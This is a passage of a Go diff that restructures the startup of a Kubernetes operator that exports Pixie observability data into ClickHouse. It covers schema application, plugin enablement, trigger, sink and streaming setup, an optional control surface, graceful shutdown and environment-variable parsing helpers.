+ // DefaultServeMux. Bind loopback in containers unless you port-forward.
+ if addr := os.Getenv("AE_PPROF_ADDR"); addr != "" {
+ go func() {
+ log.WithField("addr", addr).Info("pprof listening (/debug/pprof/*)")
+ if err := http.ListenAndServe(addr, nil); err != nil &&
+ err != http.ErrServerClosed {
+ log.WithError(err).Error("pprof listener stopped")
+ }
+ }()
+ }
+
+ log.Info("starting adaptive-export operator (push flow, rev 2)")
cfg, err := config.GetConfig()
if err != nil {
log.WithError(err).Fatal("failed to load configuration")
}
- clusterID := cfg.Pixie().ClusterID()
- clusterName := cfg.Worker().ClusterName()
-
- // Setup Pixie Plugin API client
- log.Infof("Setting up Pixie plugin API client for cluster-id %s", clusterID)
- pluginClient, err := setupPixie(ctx, cfg.Pixie(), defaultRetries, defaultSleepTime)
+ hostname, err := resolveHostname()
if err != nil {
- log.WithError(err).Fatal("setting up Pixie plugin client failed")
+ log.WithError(err).Fatal("failed to resolve node identity — set NODE_NAME via k8s downward API (spec.nodeName)")
}
+ log.WithField("hostname", hostname).Info("operator pod is node-local")
+
+ chEndpoint := chHTTPEndpoint(cfg.ClickHouse().Host(), os.Getenv(envCHHTTPEndpoint))
+ log.WithField("endpoint", chEndpoint).Info("clickhouse HTTP endpoint resolved")
- // Setup Pixie pxapi client for executing PxL scripts
- log.Info("Setting up Pixie pxapi client")
- // Use parent context - client stores this and uses it for all subsequent operations
- pxClient, err := pxapi.NewClient(ctx, pxapi.WithAPIKey(cfg.Pixie().APIKey()), pxapi.WithCloudAddr(cfg.Pixie().Host()))
+ // 1. Apply operator-owned DDL FIRST, before Pixie's retention plugin
+ // has a chance to auto-create pixie tables with its minimal
+ // column set (no namespace / pod). The kubescape tables
+ // (alerts, kubescape_logs) are owned by the soc installer and
+ // are NOT touched here.
+ applier, err := clickhouse.NewApplier(chEndpoint, cfg.ClickHouse().User(), cfg.ClickHouse().Password())
if err != nil {
- log.WithError(err).Fatal("failed to create pxapi client")
- }
-
- // Start schema creation background task. This drives
- // px.CreateClickHouseSchemas, which issues CREATE TABLE IF NOT EXISTS
- // for every Pixie stirling table the metadata service knows about. In
- // labs where ClickHouse users don't have DDL rights (e.g. soc's
- // ingest_writer with allow_ddl=0), the CREATE silently fails and only
- // tables pre-created by external schema.sql work. Off by default to
- // avoid noisy server logs; opt-in via env when you want Pixie's
- // automatic schema bootstrap.
- if strings.EqualFold(os.Getenv("ENABLE_SCHEMA_CREATION"), "true") {
- log.Info("ENABLE_SCHEMA_CREATION=true — starting schema creation task")
- go runSchemaCreationTask(ctx, pxClient, clusterID, cfg.ClickHouse())
+ log.WithError(err).Fatal("failed to construct schema applier")
+ }
+ if strings.EqualFold(os.Getenv(envSkipApply), "true") {
+ log.Info("ADAPTIVE_SKIP_APPLY=true — schema apply skipped; expecting an out-of-band DDL Job to have created the tables")
} else {
- log.Info("Schema creation task disabled (set ENABLE_SCHEMA_CREATION=true to opt in)")
+ if err := applier.Apply(ctx); err != nil {
+ log.WithError(err).Fatal("schema apply failed; refusing to proceed with possibly drifted tables")
+ }
+ log.WithField("tables", clickhouse.OperatorOwnedTables).Info("operator-owned DDL applied")
}
- // Start detection + reconcile loop that turns the retention plugin on/off
- go runDetectionTask(ctx, pxClient, pluginClient, cfg, clusterID, clusterName)
-
- // Wait for signal to shutdown
- sigCh := make(chan os.Signal, 1)
- signal.Notify(sigCh, syscall.SIGINT, syscall.SIGTERM)
- <-sigCh
-
- log.Info("Shutting down adaptive export service")
- cancel()
- time.Sleep(1 * time.Second)
-}
+ // 2. Defensive guard against Pixie's retention plugin having
+ // auto-created any pixie table BEFORE our Apply ran (e.g. a
+ // pre-existing cluster install). Refuse to start if drift
+ // detected so the misconfig is loud, not silent.
+ if err := applier.VerifyPixieSchema(ctx); err != nil {
+ log.WithError(err).Fatal("pixie table schema drift detected — pre-existing tables are missing operator-required columns; drop and re-create OR ALTER TABLE ADD COLUMN before retrying")
+ }
+ log.Info("pixie table schemas verified — namespace + pod columns present on all 12 tables")
+
+ // 3. Best-effort: ensure the Pixie ClickHouse retention plugin is
+ // enabled. The retention scripts themselves are defined by the
+ // user via the Pixie UI — we don't manage them. The cloud client
+ // is OPTIONAL — direct-mode query (ADAPTIVE_VIZIER_DIRECT_ADDR) does not
+ // need it, so a cloud-side outage must not block the operator
+ // from starting. Downgrade the failure to a warning and skip the
+ // plugin/preset steps that depend on this client.
+ pluginClient, err := pixie.NewClient(ctx, cfg.Pixie().APIKey(), cfg.Pixie().Host())
+ if err != nil {
+ log.WithError(err).Warn("could not create pixie cloud plugin client — skipping plugin enablement and preset install; pixie tables will stay empty until the user enables the plugin in the Pixie UI")
+ pluginClient = nil
+ }
+ if pluginClient != nil {
+ chDSN := cfg.ClickHouse().DSN()
+ exportURL, err := pluginClient.EnsureClickHousePluginEnabled(chDSN)
+ if err != nil {
+ // non-fatal — the operator's own write path doesn't depend on
+ // the plugin; analyst joins against pixie-table rows do, but a
+ // missing plugin is a deployment misconfiguration the user
+ // surfaces via UI.
+ log.WithError(err).Warn("could not ensure ClickHouse plugin is enabled — pixie tables will not be populated until you turn it on in the Pixie UI")
+ } else {
+ log.WithField("export_url", exportURL).Info("clickhouse retention plugin is enabled")
+ }
-func runSchemaCreationTask(ctx context.Context, client *pxapi.Client, clusterID string, chCfg config.ClickHouse) {
- ticker := time.NewTicker(schemaCreationInterval)
- defer ticker.Stop()
-
- runOnce := func() {
- log.Info("Running schema creation script")
- execCtx, cancel := context.WithTimeout(ctx, scriptExecutionTimeout)
- defer cancel()
- if _, err := pxl.ExecuteScript(execCtx, client, clusterID, renderSchemaScript(chCfg)); err != nil {
- log.WithError(err).Error("failed to execute schema creation script")
- return
+ // 3b. (optional) install Pixie's preset retention scripts so the
+ // pixie observation tables actually receive rows. Without this,
+ // the plugin is enabled but does nothing.
+ if strings.EqualFold(os.Getenv(envInstallPresets), "true") {
+ installed, err := installPresetScripts(pluginClient, cfg.Pixie().ClusterID(), cfg.Worker().ClusterName())
+ if err != nil {
+ log.WithError(err).Warn("INSTALL_PRESET_SCRIPTS=true but install failed — pixie tables will stay empty")
+ } else {
+ log.WithField("installed", installed).Info("preset retention scripts installed on cluster")
+ }
}
- log.Info("Schema creation script completed successfully")
}
- runOnce()
- for {
- select {
- case <-ctx.Done():
- log.Info("Schema creation task shutting down")
- return
- case <-ticker.C:
- runOnce()
- }
+ // 4. Build trigger + sink + controller.
+ pollInterval := durEnv(envTriggerPollMS, 250*time.Millisecond, time.Millisecond)
+ httpTimeout := durEnv(envTriggerHTTPTimeoutSec, 30*time.Second, time.Second)
+ saveInterval := durEnv(envWatermarkSaveSec, 5*time.Second, time.Second)
+ pollLimit := intEnv(envTriggerPollLimit, 10000)
+ // Persistent watermark store keeps the trigger's kubescape_logs
+ // cursor in forensic_db.trigger_watermark, so a restart on a busy
+ // node doesn't replay the full table from event_time=0 (which
+ // timed out every single HTTP read and pinned the watermark at 0
+ // forever — the failure mode that produced "AE silent for 10h
+ // after OOM-restart" in the field).
+ wmStore, err := trigger.NewClickHouseWatermarkStore(
+ chEndpoint, cfg.ClickHouse().Database(),
+ cfg.ClickHouse().User(), cfg.ClickHouse().Password(),
+ httpTimeout)
+ if err != nil {
+ log.WithError(err).Fatal("failed to create persistent watermark store")
+ }
+ trg, err := trigger.New(trigger.Config{
+ Endpoint: chEndpoint,
+ Database: cfg.ClickHouse().Database(),
+ Table: cfg.ClickHouse().Table(),
+ Username: cfg.ClickHouse().User(),
+ Password: cfg.ClickHouse().Password(),
+ Hostname: hostname,
+ PollInterval: pollInterval,
+ Watermark: wmStore,
+ WatermarkSaveInterval: saveInterval,
+ PollLimit: pollLimit,
+ HTTPTimeout: httpTimeout,
+ })
+ if err != nil {
+ log.WithError(err).Fatal("failed to create trigger")
+ }
+
+ snk, err := sink.New(sink.Config{
+ Endpoint: chEndpoint,
+ Database: cfg.ClickHouse().Database(),
+ Username: cfg.ClickHouse().User(),
+ Password: cfg.ClickHouse().Password(),
+ })
+ if err != nil {
+ log.WithError(err).Fatal("failed to create sink")
}
-}
-func runDetectionTask(ctx context.Context, pxClient *pxapi.Client, pluginClient *pixie.Client, cfg config.Config, clusterID string, clusterName string) {
- detectionInterval := time.Duration(cfg.Worker().DetectionInterval()) * time.Second
- detectionLookback := cfg.Worker().DetectionLookback()
- quietTicks := cfg.Worker().ExportQuietTicks()
- mode := cfg.Worker().ExportMode()
+ // Per-pull write-fidelity instrument (ADAPTIVE_RECONCILE). When on,
+ // the CH-backed sink IS the Recorder; otherwise a Nop drops every row.
+ // Shared by the controller fan-out, passthrough, and streaming paths.
+ var rec reconcile.Recorder = reconcile.Nop{}
+ if strings.EqualFold(os.Getenv(envReconcile), "true") {
+ rec = snk
+ log.Info("ADAPTIVE_RECONCILE=true — per-pull read/wrote counts → forensic_db.ae_reconcile")
+ }
- ticker := time.NewTicker(detectionInterval)
- defer ticker.Stop()
+ // Mode selection:
+ // "streaming" → rev-3: leave PushPixieTables EMPTY (so the
+ // controller skips fan-out) and stand up the
+ // streaming.Supervisor instead.
+ // else → rev-2: per-hash×per-table fan-out (legacy).
+ streamingMode := strings.EqualFold(os.Getenv(envAdaptiveWriteMode), "streaming")
+ pushPixieRequested := strings.EqualFold(os.Getenv(envPushPixieTables), "true")
+ if streamingMode && pushPixieRequested {
+ log.Info("ADAPTIVE_WRITE_MODE=streaming overrides ADAPTIVE_PUSH_PIXIE_ROWS — fan-out disabled, streaming.Supervisor will own protocol-table writes")
+ }
- // pluginEnabled tracks our last-known retention-plugin state. A nil value means
- // we haven't reconciled yet; we always query on the first tick.
- var pluginEnabled *bool
- quietStreak := int64(0)
+ // Shared ActiveSet (consumed by streaming mode and the CONTROL_ADDR control surface; harmless in pull mode).
+ activeSet := activeset.New()
+ // AttributionNotifier — non-blocking shim so the controller's
+ // synchronous OnAttribution / OnPrune callbacks don't pin
+ // controller.handle on slow ActiveSet writes. Tests in
+ // streaming/notifier_test.go cover the buffer-overflow + drop
+ // semantics. The Run goroutine is started below in streaming mode.
+ attrNotifier := streaming.NewAttributionNotifier(activeSet, streaming.NotifierConfig{
+ BufferSize: intEnvOrZero("ADAPTIVE_STREAM_NOTIFIER_BUFFER"),
+ })
- reconcile := func(want bool) {
- if pluginEnabled != nil && *pluginEnabled == want {
- log.Debugf("export already in desired state (enabled=%v), no action taken", want)
- return
+ ctlCfg := controller.Config{
+ Hostname: hostname,
+ Rec: rec,
+ Before: durEnv(envWindowBeforeSec, 5*time.Minute, time.Second),
+ After: durEnv(envWindowAfterSec, 5*time.Minute, time.Second),
+ MaxParallelQueriesPerHash: intEnvOrZero(envMaxParallelQueriesPerHash),
+ MaxInflightQueriesGlobal: intEnvOrZero(envMaxInflightQueriesGlobal),
+ EmptyResultSkipAfterN: intEnvOrZero(envEmptyResultSkipAfterN),
+ EmptyResultSkipTTL: durEnvOrZero(envEmptyResultSkipTTLSec, time.Second),
+ }
+ if streamingMode {
+ // Route through the non-blocking notifier — handle() returns
+ // in <1µs even if ActiveSet writers are slow. Host-pid pods
+ // (empty Pod) are filtered inside the notifier.
+ ctlCfg.OnAttribution = attrNotifier.SubmitFromController
+ ctlCfg.OnPrune = attrNotifier.RemoveFromController
+ }
+ if !streamingMode && pushPixieRequested {
+ // PxL's px.DataFrame(table=…) rejects dotted table names even
+ // though px.GetSchemas() lists them. Drop them from the push
+ // list; the cloud-side retention plugin would have to handle
+ // those if the user wants them.
+ var tables []string
+ for _, t := range pxl.Names(pxl.Builtins()) {
+ if strings.Contains(t, ".") {
+ log.WithField("table", t).Info("skipping dotted-name table from push list — PxL DataFrame rejects it")
+ continue
+ }
+ tables = append(tables, t)
}
- pluginCtx, pluginCancel := context.WithTimeout(ctx, 2*time.Minute)
- defer pluginCancel()
- if want {
- log.Info("Enabling forensic export")
- if err := enableClickHousePlugin(pluginCtx, pluginClient, cfg, clusterID, clusterName); err != nil {
- log.WithError(err).Error("failed to enable forensic export")
- return
+ ctlCfg.PushPixieTables = tables
+ log.WithField("tables", ctlCfg.PushPixieTables).
+ Info("ADAPTIVE_PUSH_PIXIE_ROWS=true — operator will query pixie + write rows directly on each anomaly")
+ }
+ // Optional single-shot / custom refresh override (default-unchanged when
+ // unset). Negative → single-shot: exactly one pull per anomaly window.
+ if v := strings.TrimSpace(os.Getenv(envPushRefreshSec)); v != "" {
+ if n, err := strconv.Atoi(v); err == nil {
+ if n < 0 {
+ ctlCfg.PushRefreshInterval = -1
+ log.Info(envPushRefreshSec + "<0 — single-shot pull mode (one pull per anomaly window)")
+ } else {
+ ctlCfg.PushRefreshInterval = time.Duration(n) * time.Second
}
- v := true
- pluginEnabled = &v
- log.Info("Forensic export enabled successfully")
} else {
- log.Info("Disabling forensic export")
- if err := disableClickHousePlugin(pluginCtx, pluginClient, cfg, clusterID, clusterName); err != nil {
- log.WithError(err).Error("failed to disable forensic export")
- return
- }
- v := false
- pluginEnabled = &v
- quietStreak = 0
- log.Info("Forensic export disabled successfully")
+ log.WithField("value", v).Warn(envPushRefreshSec + " not an integer; using default refresh")
}
}
-
- log.Infof("Detection task starting (mode=%s, quietTicks=%d)", mode, quietTicks)
-
- for {
- select {
- case <-ctx.Done():
- log.Info("Detection task shutting down")
- return
- case <-ticker.C:
- switch mode {
- case config.ExportModeAlways:
- reconcile(true)
- continue
- case config.ExportModeNever:
- reconcile(false)
- continue
+ ctl := controller.New(trg, snk, ctlCfg, nil)
+
+ // Build the pixie adapter ONCE — shared by rev-2's pushPixieRows
+ // path, the rev-3 streaming.Supervisor, AND the firehose passthrough
+ // loop. All three need a live pxapi client; constructing once avoids
+ // holding two parallel grpc streams for the same vizier.
+ passthroughEnabled := strings.EqualFold(os.Getenv(envPassthrough), "true")
+ var pixieAdapterInst *pixieapi.Adapter
+ if len(ctlCfg.PushPixieTables) > 0 || streamingMode || passthroughEnabled {
+ var adapter *pixieapi.Adapter
+ if direct := os.Getenv("ADAPTIVE_VIZIER_DIRECT_ADDR"); direct != "" {
+ // Direct mode — bypass the cloud's passthrough proxy and
+ // connect to the in-cluster vizier-query-broker. Use this
+ // on self-hosted clouds where pxapi.WithAPIKey isn't
+ // authorized for the cluster (e.g. a freshly-deployed
+ // vizier whose ID isn't yet linked to the API key's owner).
+ a, err := pixieapi.NewDirectFromEnv(cfg.Pixie().ClusterID())
+ if err != nil {
+ log.WithError(err).Fatal("ADAPTIVE_VIZIER_DIRECT_ADDR set but direct-mode adapter init failed")
}
-
- // auto mode: detection drives the state.
- log.Debug("Running detection script")
- execCtx, cancel := context.WithTimeout(ctx, scriptExecutionTimeout)
- recordCount, err := pxl.ExecuteScript(execCtx, pxClient, clusterID, renderDetectionScript(cfg.ClickHouse(), detectionLookback))
- cancel()
+ log.WithField("addr", direct).Info("pixieapi: direct mode (bypassing cloud proxy)")
+ adapter = a
+ } else {
+ pxClient, err := pxapi.NewClient(ctx,
+ pxapi.WithAPIKey(cfg.Pixie().APIKey()),
+ pxapi.WithCloudAddr(cfg.Pixie().Host()))
if err != nil {
- log.WithError(err).Error("failed to execute detection script")
- continue
+ log.WithError(err).Fatal("failed to create pxapi client")
}
- log.Debugf("Detection script returned %d records", recordCount)
+ adapter = pixieapi.New(pxClient, cfg.Pixie().ClusterID())
+ }
+ pixieAdapterInst = adapter
+ if len(ctlCfg.PushPixieTables) > 0 {
+ ctl = ctl.WithPixieQuerier(&pixieAdapter{a: adapter})
+ }
+ }
- if recordCount > 0 {
- quietStreak = 0
- reconcile(true)
- } else {
- quietStreak++
- if quietStreak >= quietTicks {
- reconcile(false)
+ // 5. Rehydrate active state across crashes.
+ if err := ctl.Rehydrate(ctx); err != nil {
+ log.WithError(err).Warn("could not rehydrate active set; starting cold")
+ } else {
+ log.WithField("active", ctl.Active()).Info("active set rehydrated")
+ }
+
+ // 6. Periodic prune of in-memory expired entries + main controller loop.
+ // Both goroutines are tracked in a WaitGroup so SIGTERM cleanly waits
+ // for in-flight HTTP calls (trigger timeout defaults to 30s, sink 30s timeout)
+ // instead of being cut off by an arbitrary fixed sleep.
+ pruneInterval := durEnv(envPruneIntervalSec, 30*time.Second, time.Second)
+ var wg sync.WaitGroup
+ wg.Add(1)
+ go func() {
+ defer wg.Done()
+ t := time.NewTicker(pruneInterval)
+ defer t.Stop()
+ for {
+ select {
+ case <-ctx.Done():
+ return
+ case <-t.C:
+ if removed := ctl.PruneExpired(); removed > 0 {
+ log.WithField("removed", removed).Debug("pruned expired active entries")
}
}
}
+ }()
+
+ // 7. Run the controller.
+ wg.Add(1)
+ go func() {
+ defer wg.Done()
+ if err := ctl.Run(ctx); err != nil && err != context.Canceled {
+ log.WithError(err).Error("controller exited with error")
+ }
+ }()
+
+ // 7b. Streaming mode (rev-3): start the per-table scanners +
+ // batched writers. Replaces the per-hash×per-table fan-out.
+ if streamingMode {
+ // Start the AttributionNotifier consumer so SubmitFromController
+ // calls actually get delivered to ActiveSet.
+ wg.Add(1)
+ go func() {
+ defer wg.Done()
+ attrNotifier.Run(ctx)
+ }()
+
+ // Seed the ActiveSet from the rehydrated controller so existing
+ // alive attribution rows resume streaming immediately on boot.
+ // Without this seeding, only fresh kubescape events would
+ // repopulate the set — losing N minutes of coverage per restart.
+ seedActiveSetFromRehydrate(ctl, activeSet)
+
+ builtins := pxl.Builtins()
+ streamTables := make([]string, 0, len(builtins))
+ for _, t := range pxl.Names(builtins) {
+ if strings.Contains(t, ".") {
+ continue // PxL DataFrame rejects dotted names
+ }
+ streamTables = append(streamTables, t)
+ }
+ updater := streaming.NewUpdater(activeSet, streaming.UpdaterConfig{
+ Debounce: durEnvOrZero("ADAPTIVE_STREAM_DEBOUNCE_SEC", time.Second),
+ MaxAllowlistSize: intEnvOrZero("ADAPTIVE_STREAM_MAX_ALLOWLIST"),
+ })
+ supervisor := streaming.NewSupervisor(
+ updater,
+ &pixieAdapter{a: pixieAdapterInst},
+ snk,
+ streamTables,
+ streaming.ScannerConfig{
+ QueryWindow: durEnvOrZero("ADAPTIVE_STREAM_WINDOW_SEC", time.Second),
+ RefreshInterval: durEnvOrZero("ADAPTIVE_STREAM_REFRESH_SEC", time.Second),
+ Rec: rec,
+ Hostname: hostname,
+ },
+ streaming.WriterConfig{
+ BatchRows: intEnvOrZero("ADAPTIVE_STREAM_BATCH_ROWS"),
+ BatchEvery: durEnvOrZero("ADAPTIVE_STREAM_BATCH_EVERY_SEC", time.Second),
+ },
+ )
+ wg.Add(1)
+ go func() {
+ defer wg.Done()
+ supervisor.Run(ctx)
+ }()
+ log.WithField("tables", streamTables).Info("rev-3 streaming supervisor started")
}
-}
-func disableClickHousePlugin(ctx context.Context, client *pixie.Client, cfg config.Config, clusterID string, clusterName string) error {
- plugin, err := client.GetClickHousePlugin()
- if err != nil {
- return fmt.Errorf("getting data retention plugins failed: %w", err)
+ // 7c. Firehose passthrough loop — independent of fan-out / streaming.
+ // Off unless ADAPTIVE_PASSTHROUGH=true. Reuses the same adapter +
+ // sink so byte-shape of written rows matches the AE-filter phase.
+ if passthroughEnabled {
+ if pixieAdapterInst == nil {
+ log.Fatal("ADAPTIVE_PASSTHROUGH=true but pixie adapter is nil — internal wiring bug")
+ }
+ // Compiled path is the default; ADAPTIVE_PASSTHROUGH_COMPILED=false
+ // reverts to the legacy serial QueryFor loop.
+ compiled := !strings.EqualFold(os.Getenv(envPassthroughCompiled), "false")
+ ptCfg := passthrough.Config{
+ Window: durEnv(envPassthroughWindow, 30*time.Second, time.Second),
+ Refresh: durEnv(envPassthroughRefresh, 30*time.Second, time.Second),
+ Rec: rec,
+ Hostname: hostname,
+ Compiled: compiled,
+ }
+ ptLoop := passthrough.New(&pixieAdapter{a: pixieAdapterInst}, snk, ptCfg)
+ wg.Add(1)
+ go func() {
+ defer wg.Done()
+ ptLoop.Run(ctx)
+ }()
+ log.WithFields(log.Fields{
+ "window": ptCfg.Window,
+ "refresh": ptCfg.Refresh,
+ "compiled": ptCfg.Compiled,
+ }).Info("ADAPTIVE_PASSTHROUGH=true — firehose loop running (no anomaly gate)")
}
- if !plugin.RetentionEnabled {
- log.Info("ClickHouse plugin already disabled; removing any lingering ch-* scripts")
- } else {
- if err := client.DisableClickHousePlugin(plugin.LatestVersion); err != nil {
- return fmt.Errorf("failed to disable ClickHouse plugin: %w", err)
+
+ log.WithFields(log.Fields{
+ "hostname": hostname,
+ "poll_interval": pollInterval,
+ "prune_interval": pruneInterval,
+ "window_before": ctlCfg.Before,
+ "window_after": ctlCfg.After,
+ }).Info("operator running")
+
+ // control surface: when CONTROL_ADDR is set, the per-node controller
+ // steers this AE's activeSet (Upsert/Remove) over HTTP. Off by default so
+ // the existing trigger→controller→activeSet flow is unchanged.
+ if addr := os.Getenv("CONTROL_ADDR"); addr != "" {
+ ctrlSrv := control.New(activeSet, nil) // OrderQuery runner wired later
+ ctrlSrv.SetGraphWriter(applier) // dx_attack_graph ingest → ClickHouse
+ // Bearer-JWT auth on the control surface (CodeRabbit: protect control
+ // endpoints). Same shared lib + signing key the broker/PEM use — dx
+ // attaches the service JWT it already mints. Default-OFF so this can
+ // merge before dx sends the bearer; flip CONTROL_REQUIRE_AUTH=true once
+ // dx is updated + PL_JWT_SIGNING_KEY is mounted. Safe incremental rollout.
+ if key := os.Getenv("PL_JWT_SIGNING_KEY"); key != "" && os.Getenv("CONTROL_REQUIRE_AUTH") == "true" {
+ ctrlSrv.SetAuth(key, "vizier")
+ log.Info("control surface: bearer-JWT auth ENABLED (audience=vizier)")
+ } else {
+ log.Warn("control surface: auth DISABLED (set CONTROL_REQUIRE_AUTH=true + PL_JWT_SIGNING_KEY)")
}
+ // Wrap in an http.Server with explicit timeouts so a slow client
+ // can't pin a goroutine on the control surface (CodeRabbit
+ // r3379377432). The control plane is small/idempotent JSON, so
+ // short read/write budgets are fine.
+ httpSrv := &http.Server{
+ Addr: addr,
+ Handler: ctrlSrv.Handler(),
+ ReadHeaderTimeout: 5 * time.Second,
+ ReadTimeout: 15 * time.Second,
+ WriteTimeout: 30 * time.Second,
+ IdleTimeout: 60 * time.Second,
+ }
+ go func() {
+ log.WithField("addr", addr).Info("control surface listening")
+ if err := httpSrv.ListenAndServe(); err != nil &&
+ err != http.ErrServerClosed {
+ log.WithError(err).Error("control surface stopped")
+ }
+ }()
}
- // Tear down the per-cluster ch-* retention scripts so the demo can be re-run cleanly.
- current, err := client.GetClusterScripts(clusterID, clusterName)
- if err != nil {
- return fmt.Errorf("failed to list retention scripts: %w", err)
+ sigCh := make(chan os.Signal, 1)
+ signal.Notify(sigCh, syscall.SIGINT, syscall.SIGTERM)
+ <-sigCh
+ log.Info("shutdown signal received; waiting for goroutines to drain")
+ cancel()
+ // Bound the wait so a hung HTTP call can't keep the process up forever.
+ done := make(chan struct{})
+ go func() { wg.Wait(); close(done) }()
+ select {
+ case <-done:
+ log.Info("clean shutdown")
+ case <-time.After(35 * time.Second):
+ log.Warn("shutdown deadline reached with goroutines still running; exiting")
}
- var errs []error
- for _, s := range current {
- log.Infof("Deleting retention script %s", s.Name)
- if err := client.DeleteDataRetentionScript(s.ScriptId); err != nil {
- errs = append(errs, err)
- }
+}
+
+// chHTTPEndpoint resolves the ClickHouse HTTP endpoint. Explicit env
+// override wins; otherwise build "http://<host>:8123" from config.
+func chHTTPEndpoint(host, override string) string {
+ if override != "" {
+ return strings.TrimRight(override, "/")
}
- if len(errs) > 0 {
- return fmt.Errorf("errors while deleting retention scripts: %v", errs)
+ if host == "" {
+ host = "localhost"
}
- return nil
+ return "http://" + host + ":8123"
}
-func enableClickHousePlugin(ctx context.Context, client *pixie.Client, cfg config.Config, clusterID string, clusterName string) error {
- log.Info("Checking the current ClickHouse plugin configuration")
- plugin, err := client.GetClickHousePlugin()
- if err != nil {
- return fmt.Errorf("getting data retention plugins failed: %w", err)
+// resolveHostname picks the node identity for node-local scoping.
+// REQUIRES NODE_NAME (set via k8s downward API spec.nodeName). The
+// previous os.Hostname() fallback returned the POD hostname, not the
+// node — making the operator silently miss its node's rows.
+func resolveHostname() (string, error) {
+ if v := strings.TrimSpace(os.Getenv(envNodeName)); v != "" {
+ return v, nil
}
+ return "", fmt.Errorf("%s env var is required (set via k8s downward API: valueFrom.fieldRef.fieldPath=spec.nodeName)", envNodeName)
+}
- enablePlugin := true
- if plugin.RetentionEnabled {
- enablePlugin = false
- config, err := client.GetClickHousePluginConfig()
- if err != nil {
- return fmt.Errorf("getting ClickHouse plugin config failed: %w", err)
- }
- if config.ExportURL != cfg.ClickHouse().DSN() {
- log.Info("ClickHouse plugin is configured with different DSN... Overwriting")
- enablePlugin = true
- }
+// durEnv reads a positive-integer-valued duration env var. unit
+// defines the unit (time.Second, time.Millisecond). Returns dflt on
+// missing / unparseable / non-positive values — non-positive would
+// either panic time.NewTicker or invert the attribution window, so
+// we fall back to the default and log loudly.
+func durEnv(key string, dflt, unit time.Duration) time.Duration {
+ v := strings.TrimSpace(os.Getenv(key))
+ if v == "" {
+ return dflt
+ }
+ n, err := strconv.ParseInt(v, 10, 64)
+ if err != nil {
+ log.WithError(err).WithFields(log.Fields{"key": key, "value": v}).
+ Warn("invalid duration env; using default")
+ return dflt
+ }
+ if n <= 0 {
+ log.WithFields(log.Fields{"key": key, "value": v}).
+ Warn("non-positive duration env; using default")
+ return dflt
}
+ return time.Duration(n) * unit
+}
- if enablePlugin {
- log.Info("Enabling ClickHouse plugin")
- err := client.EnableClickHousePlugin(&pixie.ClickHousePluginConfig{
- ExportURL: cfg.ClickHouse().DSN(),
- }, plugin.LatestVersion)
- if err != nil {
- return fmt.Errorf("failed to enable ClickHouse plugin: %w", err)
- }
+// intEnv reads a positive-integer-valued env var. Returns dflt on
+// missing / unparseable / non-positive. Same shape as durEnv but
+// without the unit multiplier — for counts (e.g. row limits).
+func intEnv(key string, dflt int) int {
+ v := strings.TrimSpace(os.Getenv(key))
+ if v == "" {
+ return dflt
+ }
+ n, err := strconv.Atoi(v)
+ if err != nil {
+ log.WithError(err).WithFields(log.Fields{"key": key, "value": v}).
+ Warn("invalid int env; using default")
+ return dflt
}
+ if n <= 0 {
+ log.WithFields(log.Fields{"key": key, "value": v}).
+ Warn("non-positive int env; using default")
+ return dflt
+ }
+ return n
+}
- log.Info("Setting up the data retention scripts")
+// intEnvOrZero is like intEnv but treats unset / empty / unparseable /
+// negative as 0 (= "feature disabled"). Used for opt-in throttle knobs where
+// 0 preserves legacy behavior and a positive integer enables the throttle.
+func intEnvOrZero(key string) int {
+ v := strings.TrimSpace(os.Getenv(key))
+ if v == "" {
+ return 0
+ }
+ n, err := strconv.Atoi(v)
+ if err != nil || n < 0 {
+ log.WithFields(log.Fields{"key": key, "value": v}).
+ Warn("invalid int env; treating as 0 (disabled)")
+ return 0
+ }
+ return n
+}
- log.Info("Getting preset script from the Pixie plugin")
- defsFromPixie, err := client.GetPresetScripts()
- if err != nil {
- return fmt.Errorf("failed to get preset scripts: %w", err)
+// durEnvOrZero is the duration-typed counterpart. unit lets the caller
+// express the env value in seconds / milliseconds without per-knob
+// parsing logic. 0 → returned as 0 (= feature disabled).
+func durEnvOrZero(key string, unit time.Duration) time.Duration {
+ n := intEnvOrZero(key)
+ if n <= 0 {
+ return 0
}
+ return time.Duration(n) * unit
+}
- // Filter presets by an allow-list of case-insensitive substrings in the
- // script name. Useful when the destination ClickHouse doesn't have every
- // target table pre-created (Pixie's C++ ClickHouseExportSinkNode aborts
- // kelvin on UNKNOWN_TABLE from CH — upstream bug), so we must not install
- // retention scripts whose target table is missing.
+// seedActiveSetFromRehydrate reads the operator's rehydrated
+// attribution rows back from CH and Upserts them into the streaming
+// ActiveSet. Without this, a restart in streaming mode leaves the
+// scanners with an empty allowlist until the next kubescape event
+// arrives — N minutes of coverage gap per restart.
+func seedActiveSetFromRehydrate(ctl *controller.Controller, set *activeset.ActiveSet) {
+ // The controller's Rehydrate already populated its in-memory
+ // active map from CH. We re-issue QueryActive here to mirror
+ // those rows into the ActiveSet — keeping the streaming layer
+ // fully decoupled from controller internals.
//
- // Example: ALLOWED_RETENTION_SCRIPTS="conn_stats" installs only the
- // conn_stats preset (matches "conn_stats export"), skipping dc_snoop +
- // stack_traces which target tables that don't exist in soc's schema.sql.
- //
- // Empty/unset = no filter (install every preset — the prior behavior).
- definitions := defsFromPixie
- if allow := strings.TrimSpace(os.Getenv("ALLOWED_RETENTION_SCRIPTS")); allow != "" {
- tokens := strings.Split(allow, ",")
- filtered := make([]*script.ScriptDefinition, 0, len(defsFromPixie))
- for _, d := range defsFromPixie {
- nameLower := strings.ToLower(d.Name)
- for _, t := range tokens {
- t = strings.ToLower(strings.TrimSpace(t))
- if t != "" && strings.Contains(nameLower, t) {
- filtered = append(filtered, d)
- break
- }
- }
+ // Timeout: defaults to 60s (bumped from a 30s hardcode for
+ // the rev-2 schema); ADAPTIVE_SCRIPT_TIMEOUT_SECONDS overrides for
+ // busy clusters where a large rehydrate snapshot won't land in
+ // the default window. Defensive: the operator could not reproduce
+ // the original "DeadlineExceeded" symptom on the soak PG, but
+ // the env knob exists so operators don't have to ship a patch
+ // to widen it.
+ scriptTimeout := durEnv("ADAPTIVE_SCRIPT_TIMEOUT_SECONDS", 60*time.Second, time.Second)
+ ctx, cancel := context.WithTimeout(context.Background(), scriptTimeout)
+ defer cancel()
+ rows, err := ctl.SnapshotActive(ctx)
+ if err != nil {
+ log.WithError(err).Warn("seed: SnapshotActive failed; streaming starts cold")
+ return
+ }
+ for _, r := range rows {
+ if r.Pod == "" {
+ continue
}
- log.Infof("ALLOWED_RETENTION_SCRIPTS=%q; filtered presets: %d of %d kept", allow, len(filtered), len(defsFromPixie))
- definitions = filtered
+ set.Upsert(activeset.Key{Namespace: r.Namespace, Pod: r.Pod}, r.TEnd)
}
